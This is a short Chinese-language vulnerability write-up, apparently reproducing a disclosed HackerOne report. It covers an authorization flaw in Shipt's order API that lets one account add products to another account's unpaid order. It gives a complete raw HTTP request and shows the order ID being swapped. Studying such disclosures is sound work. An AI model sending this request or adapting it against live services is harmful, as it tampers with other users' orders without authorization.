越权篡改订单给用户添加未购买的商品

1.注册两个账号，下订单不付款，获取了两个订单号1813918441和181396149

POST /aviator/v2/orders/1813918441/add.json?anonymous_id=deac090c-2b05-4402-b33f-468060058145&white_label_key=shipt&segway_version=6668a3d631495cebf307423e23a588c5f9d929c1&zip=19147&user_id=48645513&metro_id=124&store_id=60&bucket_number=72&store_location_id=13204&platform=web HTTP/2

Host: api.shipt.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0

Accept: application/json, text/plain, */*

Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

Content-Type: application/json

Content-Length: 154

Referer: https://www.shipt.com/

Origin: https://www.shipt.com

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-site

X-Pwnfox-Color: blue

Authorization: Bearer [YOUR TOKEN HERE]

Te: trailers

{“zip”:”19147″,”user_id”:48645513,”metro_id”:124,”store_id”:60,”bucket_number”:72,”store_location_id”:13204,”products”:[{“id”:4799771,”qty”:1,”note”:””}]}

2.修改1813918441订单为181396149订单的商品，发现订单商品被修改

/aviator/v2/orders/1813918441/add.json

=>

/aviator/v2/orders/181396149/add.json

参考：

https://hackerone.com/reports/1903322